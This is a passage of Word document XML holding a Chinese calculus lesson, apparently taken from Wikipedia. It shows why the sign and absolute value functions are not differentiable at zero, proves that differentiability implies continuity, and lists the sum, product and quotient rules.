          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="104775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="134" name="图片 134" descr="说明: http://bits.wikimedia.org/static-1.23wmf12/skins/common/images/magnify-clip.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId86" tooltip="&quot;放大&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说明: http://bits.wikimedia.org/static-1.23wmf12/skins/common/images/magnify-clip.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p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sgn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>函数，符号函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上面这个符号函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133" name="图片 133"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可导吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>解答</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>求出导数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132" name="图片 132"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的左右导数，根据函数可导的条件再进行判断：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>该函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131" name="图片 131"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的左导数为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4276725" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="130" name="图片 130" descr="说明: f'_{{-}}(0)=\lim _{{x\to 0^{{-}}}}{\frac  {f(x)-f(0)}{x-0}}=\lim _{{x\to 0^{{-}}}}{\frac  {-1-0}{x-0}}=\lim _{{x\to 0^{{-}}}}-{\frac  {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说明: f'_{{-}}(0)=\lim _{{x\to 0^{{-}}}}{\frac  {f(x)-f(0)}{x-0}}=\lim _{{x\to 0^{{-}}}}{\frac  {-1-0}{x-0}}=\lim _{{x\to 0^{{-}}}}-{\frac  {1}{x}}"/>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276725" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>这个极限发散，不存在，故这个符号函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129" name="图片 129"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不可导。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="2238375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="128" name="图片 128" descr="说明: http://upload.wikimedia.org/wikipedia/commons/thumb/d/d4/Function_absx.jpg/400px-Function_absx.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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说明: http://upload.wikimedia.org/wikipedia/commons/thumb/d/d4/Function_absx.jpg/400px-Function_absx.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10000" cy="2238375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="104775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="127" name="图片 127" descr="说明: http://bits.wikimedia.org/static-1.23wmf12/skins/common/images/magnify-clip.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId91" tooltip="&quot;放大&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说明: http://bits.wikimedia.org/static-1.23wmf12/skins/common/images/magnify-clip.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p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>绝对值函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上面这个</w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:tooltip="绝对值（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>绝对值</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126" name="图片 126"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可导吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>解答</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>求出导数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="125" name="图片 125"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的左右导数，根据函数可导的条件再进行判断：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>该函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124" name="图片 124"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的左导数为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3819525" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="123" name="图片 123" descr="说明: f'_{{-}}(0)=\lim _{{x\to 0^{{-}}}}{\frac  {f(x)-f(0)}{x-0}}=\lim _{{x\to 0^{{-}}}}{\frac  {-x-0}{x-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说明: f'_{{-}}(0)=\lim _{{x\to 0^{{-}}}}{\frac  {f(x)-f(0)}{x-0}}=\lim _{{x\to 0^{{-}}}}{\frac  {-x-0}{x-0}}=-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819525" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>该函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122" name="图片 122"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的右导数为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3533775" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="121" name="图片 121" descr="说明: f'_{{+}}(0)=\lim _{{x\to 0^{{+}}}}{\frac  {f(x)-f(0)}{x-0}}=\lim _{{x\to 0^{{+}}}}{\frac  {x-0}{x-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说明: f'_{{+}}(0)=\lim _{{x\to 0^{{+}}}}{\frac  {f(x)-f(0)}{x-0}}=\lim _{{x\to 0^{{+}}}}{\frac  {x-0}{x-0}}=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533775" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>该函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120" name="图片 120"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的左右导数皆存在，但由于左右导数不相等，故这个绝对值函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="438150" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119" name="图片 119" descr="说明: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说明: x=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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处不可导。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>注意：上面所用的定义式为推导定义式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>以上两个函数都是在定义域内连续的函数，由此就可以得出一个结论：连续的函数不一定处处可导。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>但处处可导的函数一定处处连续。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>证明如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>证明：设函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="118" name="图片 118" descr="说明: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说明: f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上一点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117" name="图片 117" descr="说明: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说明: x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，函数在这一点可导，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="704850" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="116" name="图片 116" descr="说明: \lim _{{\Delta x\to 0}}{\frac  {\Delta y}{\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说明: \lim _{{\Delta x\to 0}}{\frac  {\Delta y}{\Delta x}}"/>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r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>存在，其中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2085975" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="115" name="图片 115" descr="说明: \Delta y=f(x_{0}+\Delta x)-f(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说明: \Delta y=f(x_{0}+\Delta x)-f(x_{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085975" cy="200025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>所以：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4400550" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="114" name="图片 114" descr="说明: \lim _{{\Delta x\to 0}}\Delta y=\lim _{{\Delta x\to 0}}\left({\frac  {\Delta y}{\Delta x}}\cdot \Delta x\right)=\lim _{{\Delta x\to 0}}{\frac  {\Delta y}{\Delta x}}\cdot \lim _{{\Delta x\to 0}}\Delta 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说明: \lim _{{\Delta x\to 0}}\Delta y=\lim _{{\Delta x\to 0}}\left({\frac  {\Delta y}{\Delta x}}\cdot \Delta x\right)=\lim _{{\Delta x\to 0}}{\frac  {\Delta y}{\Delta x}}\cdot \lim _{{\Delta x\to 0}}\Delta x=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400550" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>即函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="113" name="图片 113" descr="说明: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说明: f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112" name="图片 112" descr="说明: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说明: x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处连续。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>导数的求导法则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在解决函数的导数问题上，利用定义是在过于麻烦。故利用定义来引申出几个基本的求导法则，以利于更好地解决各类求导的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>具体的求导方法，请参见</w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:tooltip="求导（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>求导</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>四则运算的求导法则</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1152" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:right w:val="single" w:sz="4"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188"/>
        <w:gridCol w:w="4506"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E3E3"/>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求导法则</w:t>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1</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2324100" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="111" name="图片 111" descr="说明: [u(x)\pm v(x)]'=u'(x)\pm v'(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说明: [u(x)\pm v(x)]'=u'(x)\pm v'(x)"/>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24100" cy="2095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2</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2790825" cy="209550"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="110" name="图片 110" descr="说明: [u(x)v(x)]'=u'(x)v(x)+u(x)v'(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说明: [u(x)v(x)]'=u'(x)v(x)+u(x)v'(x)"/>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90825" cy="2095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3</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2590800" cy="504825"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="109" name="图片 109" descr="说明: \left[{\frac  {u(x)}{v(x)}}\right]'={\frac  {u'(x)v(x)-u(x)v'(x)}{v^{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说明: \left[{\frac  {u(x)}{v(x)}}\right]'={\frac  {u'(x)v(x)-u(x)v'(x)}{v^{2}(x)}}"/>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90800" cy="504825"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>特别地，对于常数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
